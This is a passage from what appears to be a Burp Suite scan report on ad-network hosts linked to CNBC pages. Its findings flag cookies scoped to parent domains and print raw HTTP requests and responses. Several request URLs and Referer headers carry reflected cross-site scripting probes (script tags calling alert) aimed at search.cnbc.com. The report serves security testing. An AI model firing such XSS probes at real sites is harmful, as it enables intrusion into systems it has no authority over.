Set-Cookie: rsiPus_ONLV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h_EP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Z35U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ItMH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HIOU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j3RF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1HRX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GcFY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZM6F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zfml=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s5cG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mnCe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_muCF="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMwok2BjeU7ig3joPvhFn375OtJgctt+dtjkn6OQtDOR/YNpbDZrI2C86hj1VY7tYYo8RaaBaN6U+uIyenKXXMFkN8vM1Z/lS6m4eQU77IgshcEhyWoB8tlYqMk+ZaLMTRqhrDz1mb9hBP5lYZ3uEkfdbSZddTzqQ1p74J22EdoSmmfIwXv1xJAKPgMi/3Lss6bfgW1FkGxfhKSNryEthxFkWZ4wGlzvn22TldGUpR649q+aHN6SRQ9QvH2mnRBQp68ePtwwG1sHHr76HDiHZBThl81IHEXyyzgkJi7+wozAWpz8HzIMEnlhGaCdL3LR4uywGjg9tIdlQDp1mBiJNyb2k+yBLEHMmyzDpnMVAbGN+0gNaMEGLVjNU1cz7SQ3j0/sdWSI21dPY8WAGjbHt5EJswul4ERAnuOOfq8zMh9OQsmuhlfVTd3+gv184YLHu+z17HWnEXuKzJDDUUBdL4KVskNSaIRFpp+dS2ocyq1f0ng5zgZqz1NX3fUPfJYWTItxy1lrHebzT1OZFh/oB4YxO4Kx2JgHEcjha2H/zRdoVQjTegWqmu1CFoyL+f0dmWA5hhqO24oy7PeG5Uv8ZxB5D/zWErqb3n1nRiDfA3VZrXZ5m85mzTdHz6WJms4pQmyIDZuTnZJ7UJlxq+rT2fgJXh+3P1SwVxH4LJNmaxVkpegJ6bFWN7atAhFFf6sed+QkJ7TfjaHfCODhtMB4U70ydJ9HqBJIeEx2KtuTUvTrOJ1shc8yKdpE+87dBtFNeI6sjwM15I0Mo2X6/TAZ+GryBzlw3c+Vr5DQkC7ov+TcK3ciwWTftY8Kp8UfIdrdMLoJjt+0gDvSjJG99TNhr2L0ZBTYBAM9dXv6rEhLMi3xYI094cGcLAl9GJyv9lr1ZgCV41MitAAgT5H3rNzFWFdtMAJ51ZrI4MBbJbZjZzKsIptr67ah1OCz3//czOHcfTlOaxLo6LXH1vnSFEYxKRuSxsS0YzCzwHXnw8sZYkdcIckmrAl21FiwA7+hBd/7YtecEvis+kwyHyEqWHSdWL7HER1TCokY8BAnlxmztwMkkHICwLAjCnQOlEVfM15v9mMmJy0cRnXR7oNEXzzDOyiEK0viyr8i+3GN2O7T2QpYVG4vuSyjlmpQiMeDTmKH1iTHbHaor4+DdT+LmSGIL2yDZ2IqmxOrRhSuztNkSu0lQh8HbOoDmuw69+f4uDxJg59a6EcpoPxCjqJlU4PsXp7o9H3z3i1xbGuE9DCriq34NC6ELK8OBwGX0E5zA293s9chhxYCLIilejX1laxpZM"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxBUjF1R1o5/HgkXX/FhIvvfr+WHl5tUIizEH1qEvfY0PpxVt+Yt7nsK7nnWLbyVmnVoq+wkyqIIjotT5mhzP8D6W/yO/EWLDpnIena+gBjoZ2X5xk3FS1R2fkD1m0jLcmw3Eyq1mJmhvH4Wcdx6XoXuxNl2vZuoEDT3lQEwxZ8JblEJZfWt1tp7+PggZpQrPMNaQwXV6NwSVv/y45dn+H1VS9I2+X87boQ5mctzOOLHXMCjcC1r1UYSL8l+pU5lCEwO40F2cojUizQzC8vs5lD17nsay3T8wV95Cj1aZZeHozJtGrgi84PEvr87c2EvcrHpMXycZW5yjKsTHotVZmYnrXcMOnmIoWB4zwYRMBoh01qRCYOLnKWr0ilbhWgq3YmYIg0BQLRKaRWr6E9kEUYXOtCX8AkMEWZ/BB3ctb/0/aS1wdR3tbTGq5qcHwiXZbX+tcITF/drqn4Ohu3pPuFNjkl7hBzVpfVQsBiGHyGVAjXUoBGVFfDzXzoaA2PsJgIz9lEg7fNsgjbqvIx5Ukc5JcgM2xhhtaGYBwpXVFgRV/Xljt+yWxlUv569KS5TgelErxOgG4aXrhUP2huCfzTmlxcy9VS/n+LLYff3CoC3wllVeXF6isGPav7ROeAt7xUoX8nrQMjL8IaWj42ZwtClFb57t0+ThEZbrc5j2OQrxlDArNyoPyyqPHkQomuPXx1BFNu76/uob3zAWXCk6uvKt/hTFWKJ3TMVPLPDigzn1NeFdVUz88ARjJKLqgIQjpHOP9RnzQdp0QA469dodvjUOL7RHQQxH2X0bLie/MnwJGFNer/eDQI3bA35pCW62SiBvJSXUCHl5cUHhqzLoKJJfVZrwMzuuisVcqwPwmqZFKz5s4o7lPPntuWSCF5LOANDzcw4L2qYDyofzoHYayxYajBC03Qx3oEbuxJ1UgeNkTWWzTS2DPCv4O7nKLN7dAoJd6ODfCrYlf9UQh1FHFN67Ip/huOSwlokdliTkDW4u7GMQu3KlAt/Gd6rHoRdqCNg5gJd27+k7nz0wEiwFIjjJFz5xkWAxSyY3nPDPAF8IR1wXIXEpPdpmdhiSmzq+/PN6THNLr29fwExFY3sA9VjHrL6yboGo1ISl6QgBH+DGHcA1v6O/AjeOHPGhv7OJk9eDpe0fjIXRI7V0rr4XwqbjkcAUQgRHpd56AKFCJ7Bbmqo94f/zDaMQoYkv3eCoBIRsC4sWO9Jt8ZK/L6pt0OZjbQDMF+nvkJxiiTVvU9iRn10AUXUYrLqwLJIFYZvNdsifybhsb+/etGvwlP6dwQIG9tBNscKDO4rzJMwWEnLM7zWVPx3qUl+0fW+s+/3GaGeM77oSh3TVjKMvECHM7DrZlnYxUM9Oer8MfwxhkbYyyCYE+e7YGhTl3VAZisR0isT3ocLuw9OAZmXfi8FBouMn3xxLTiQMYe8rFQNTe1jgHq2KvHikTS7/Jwyr42GkTS9w3/UP1OQu/y4s5tIDBqzsGC5wG23JlgKlg22I22ESvFuLs1pYMpNgOhVM+LqylKzy40WaVfTxaC+K87ywrpqXk7tQPlb7EayC3UAEj0v8sDoUfeMamosvh3mryYTKLBHjjQ8ar+svv/b6qGtypmuPgDR5KSyR9ULGT7lKmBES+vs68AmuHecqLcWRvPU1BjtkUWdkAWYXMzrP3VhwhYf2Y19SFdJMBs8dVGbJYSW0gF9138D6PZIse11BYas="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://adnxs.revsci.net/imp?Z=728x90&s=1457934&r=0&_salt=65550690&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F728x90%2Fatf%3Ft%3D1308241388666%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
Content-Length: 0
Date: Thu, 16 Jun 2011 16:23:10 GMT

10.31. http://ads.undertone.com/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/ajs.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; expires=Thu, 14-Jul-2011 12:07:42 GMT; path=/; domain=.undertone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?01AD=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ&01RI=EDF749CD38DD8D0&01NA=&&zoneid=12268&cb=31129897478&t=1308207215.42&fv=10&x=0&y=0&cw=300&ch=250&loc=http%3A//search.cnbc.com/main.do%3Ftarget%3Dall%26keywords%3Dxss36c5e%253C/title%253E%253Cscript%253Ealert%281%29%253C/script%253E2789f6ff334a89918%26categories%3Dexclude%26searchboxinput%3Dxss&fr=1 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_205196.lljpe6-4837; _UTLIA[205196]=lljpij-4837; UTID=4fa40dc9ea734290be23eabae06b7886; UTPROFILES=15138%2312%3A28%7C22%3A25%2C7_24%2C39%7C23%3A25%2C7_24%2C39%7C259%3A10%2C7%7C303%3A25%7C845%3A28_25_24%2C7%7C1022%3A28_25%2C7_24%2C34%7C1023%3A28_25%2C7_24%2C35%7C1194%3A18%7C1671%3A23_22%2C2%7C2764%3A28%7C2817%3A18%7C2829%3A18%7C2837%3A18%7C2839%3A18%7C2847%3A18%7C2849%3A18%7C2851%3A18%7C2853%3A18%7C2855%3A18%7C2857%3A18%7C2859%3A18%7C2861%3A18%7C2863%3A18%7C2865%3A18%7C2976%3A10%7C2977%3A28%7C2978%3A29%2C2%7C3080%3A1; A28X=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 3588
Content-Type: text/javascript
Date: Thu, 16 Jun 2011 12:07:42 GMT
Connection: close
Set-Cookie: A28X=3b-ONaIz8GWyikrd2NXwQgWBnjUJDrl_ZW1Si2NsRYxeu1qElTaSNXQ; expires=Thu, 14-Jul-2011 12:07:42 GMT; path=/; domain=.undertone.com
Set-Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; expires=Fri, 15-Jun-2012 12:07:42 GMT; path=/
Set-Cookie: _UTLIA[205196]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: _UTLIA[215480]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: _UTLIA[215465]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_215465.lmvt2w-12268_215480.lmvt1e-12268_205196.lljpij-4837; expires=Sat, 16-Jul-2011 12:07:42 GMT; path=/
Set-Cookie: UTPROFILES=15141%239%3A1%2C3%7C12%3A31%7C22%3A28%2C7_27%2C39%7C23%3A28%2C7_27%2C39%7C259%3A13%2C7%7C303%3A28%7C845%3A31_28_27%2C7%7C1022%3A31_28%2C7_27%2C34_1%2C2%7C1023%3A31_28%2C7_27%2C35_1%2C2%7C1146%3A1%7C1147%3A1%7C1153%3A1%7C1158%3A1%7C1194%3A21%7C1671%3A26_25%2C2%7C2764%3A31%7C2817%3A21%7C2829%3A21%7C2837%3A21%7C2839%3A21%7C2847%3A21%7C2849%3A21%7C2851%3A21%7C2853%3A21%7C2855%3A21%7C2857%3A21%7C2859%3A21%7C2861%3A21%7C2863%3A21%7C2865%3A21%7C2877%3A1%7C2878%3A1%7C2881%3A1%7C2882%3A1%2C2%7C2894%3A1%7C2897%3A1%7C2898%3A1%2C2%7C2900%3A1%2C2%7C2901%3A1%2C2%7C2903%3A1%2C2%7C2909%3A1%7C2917%3A1%7C2918%3A1%7C2922%3A1%2C2%7C2924%3A1%2C2%7C2976%3A13%7C2977%3A31%7C2978%3A32%2C2%7C3080%3A4; expires=Wed, 14-Sep-2011 12:07:42 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<"+"script type=\"text/javascript\" src=\"http://altfarm.mediaplex.com/ad/js/17038-128465-5934-2?mpt=38b4d75a8b5d4290a23dd38d27892a7c&mpvc=http://ads.undertone.com/c?oaparams=2__banner
...[SNIP]...

10.32. http://ak1.abmr.net/is/ads.undertone.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/ads.undertone.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-C5E9D72F609AB56342D7A43E0245695022A8EF521BE07209A26406682CB7991C-904A48D4063CD4A2B8D883C3E57C481D3F95E8CC57DC57EE2F22A5BAE1FD2847; expires=Fri, 15-Jun-2012 12:07:39 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/ads.undertone.com?U=/ajs.php&V=3-68eF5ckAtoXL7tVvEkxVdnEO9fUyCnPWWPNoCdI5jo99NdRiXnmL%2f+3LojqTAUIV&I=EDF749CD38DD8D0&D=undertone.com&01AD=1&&zoneid=12268&cb=31129897478&t=1308207215.42&fv=10&x=0&y=0&cw=300&ch=250&loc=http%3A//search.cnbc.com/main.do%3Ftarget%3Dall%26keywords%3Dxss36c5e%253C/title%253E%253Cscript%253Ealert%281%29%253C/script%253E2789f6ff334a89918%26categories%3Dexclude%26searchboxinput%3Dxss&fr=1 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-4282643648A6D642478C29515A8E76368D2856687AE9BF6B79138225647F657A-8D33A95429C7BD0BF5183A396E6BB87726BC4BA17907840AEA71552845406675

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ads.undertone.com/ajs.php?01AD=3IwpmZYFF7y70u7fdpuk6VgRdZ1x7_JJeyAET1ffTKRq_vkYH1nxwkQ&01RI=EDF749CD38DD8D0&01NA=&&zoneid=12268&cb=31129897478&t=1308207215.42&fv=10&x=0&y=0&cw=300&ch=250&loc=http%3A//search.cnbc.com/main.do%3Ftarget%3Dall%26keywords%3Dxss36c5e%253C/title%253E%253Cscript%253Ealert%281%29%253C/script%253E2789f6ff334a89918%26categories%3Dexclude%26searchboxinput%3Dxss&fr=1
Expires: Thu, 16 Jun 2011 12:07:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:07:39 GMT
Connection: close
Set-Cookie: 01AI=2-2-C5E9D72F609AB56342D7A43E0245695022A8EF521BE07209A26406682CB7991C-904A48D4063CD4A2B8D883C3E57C481D3F95E8CC57DC57EE2F22A5BAE1FD2847; expires=Fri, 15-Jun-2012 12:07:39 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.33. http://ak1.abmr.net/is/r1-ads.ace.advertising.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-8D924653A6AD165FA1658C59BFC8997A1F8EB822854B397005CA94287003661F-07D82B8E18A77F7D44AB45757D02976890E2273CB32400A4EB33B5B9B1CD848E; expires=Fri, 15-Jun-2012 12:05:08 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/r1-ads.ace.advertising.com?U=/site=804480/size=300250/u=2/bnum=11985513/hr=6/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss3a34b%25253C%252Fscript%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E7c5fa54ba36cca68%2526categories%253Dexclude%2526searchboxinput%253Dxss&V=3-dCtNhOnJZe2utBpiCkAYIgZjYMH7sRIObtrWZLB%2fouFYkVjumFrxFTgmnjzijK78rJIs9i%2fSADc%3d&I=F82ACFAEA5EDAFA&D=r1.ace.advertising.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-E9885E77E5B9860D4F7D345E12B1431925962914B816377BB179923B4267E957-372CD22D9B6FB828A904F16138738DDA00ACC96A232C784C68F22129BBE3B773

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=11985513/hr=6/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss3a34b%25253C%252Fscript%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E7c5fa54ba36cca68%2526categories%253Dexclude%2526searchboxinput%253Dxss?01AD=3NWf8GUK4zgHocekCBO3iqRZP5jTBgqsL7mLWuUNpXtIWo-aCib8lMQ&01RI=F82ACFAEA5EDAFA&01NA=
Expires: Thu, 16 Jun 2011 12:05:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:05:08 GMT
Connection: close
Set-Cookie: 01AI=2-2-8D924653A6AD165FA1658C59BFC8997A1F8EB822854B397005CA94287003661F-07D82B8E18A77F7D44AB45757D02976890E2273CB32400A4EB33B5B9B1CD848E; expires=Fri, 15-Jun-2012 12:05:08 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.34. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-74CDF37F4850BD4C8D8DE84010917B2D1226B72FC9850C1150D49068D09F8B28-D2A3E55F379803A88BD9319A78EBF2F295EC1BA0CE803953EF4EDA79C02798C0; expires=Sat, 16-Jun-2012 10:13:07 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/iframe/677/cnbc/300x250/atf&V=3-ZVNDYQ%2fGaS2P3xqpdrCOvt2ceY+Iay4cUX+Gt0AMaGZu8JOQ%2fdUvNw%3d%3d&I=5DF2D446C35D999&D=admeld.com&01AD=1&t=1308305586056&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: 01AI=2-2-7A4F8B46258DE349A6CDB16DBBAF66573F7EB3480F8B156BAFB8A32EA4643B67-E2BFFF984BCED4C32913647A9088BD5505198B230CC752E357905636A358B7A0

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?01AD=32UbvMVGzH3yK3fzyRpt0Tzt8p9QNCWRdIPQ7_Z_OEJAIq9dMGPVQ0Q&01RI=5DF2D446C35D999&01NA=&t=1308305586056&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Expires: Fri, 17 Jun 2011 10:13:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 17 Jun 2011 10:13:07 GMT
Connection: close
Set-Cookie: 01AI=2-2-74CDF37F4850BD4C8D8DE84010917B2D1226B72FC9850C1150D49068D09F8B28-D2A3E55F379803A88BD9319A78EBF2F295EC1BA0CE803953EF4EDA79C02798C0; expires=Sat, 16-Jun-2012 10:13:07 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.35. http://ak1.abmr.net/is/www.homedepot.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.homedepot.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-E9885E77E5B9860D4F7D345E12B1431925962914B816377BB179923B4267E957-372CD22D9B6FB828A904F16138738DDA00ACC96A232C784C68F22129BBE3B773; expires=Fri, 15-Jun-2012 11:27:08 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.homedepot.com?U=/wcsstore/hdus/en_US/images/layout/youtube.png&V=3-lgdcO1S2hJrhXPGnIZ4DpBbvBP+Jkv%2fjPrj49YXGK+vxlZsv7hGT4C+97XkjeR9x&I=50DCC30DD640608&D=homedepot.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-6EC8174B7172084997FFB600278F906FC96A6C365CC2CD545D7866413736F96A-2B860A841B5528CA9620EA230F800F3BFAEC61845D27F0DAF20B1223CC902AB4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/youtube.png?01AD=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg&01RI=50DCC30DD640608&01NA=
Expires: Thu, 16 Jun 2011 11:27:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:27:08 GMT
Connection: close
Set-Cookie: 01AI=2-2-E9885E77E5B9860D4F7D345E12B1431925962914B816377BB179923B4267E957-372CD22D9B6FB828A904F16138738DDA00ACC96A232C784C68F22129BBE3B773; expires=Fri, 15-Jun-2012 11:27:08 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.36. http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d844890/33/39959888/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Wed, 16 Jun 2010 18:53:18 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-2; expires=Mon, 06 Aug 2012 10:53:19 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-2; expires=Mon, 06-Aug-2012 10:53:19 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d844890/33/39959888/decide.php?ord=1308250398 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308250393695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:53:19 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: CS1=deleted; expires=Wed, 16 Jun 2010 18:53:18 GMT; path=/; domain=.questionmarket.com
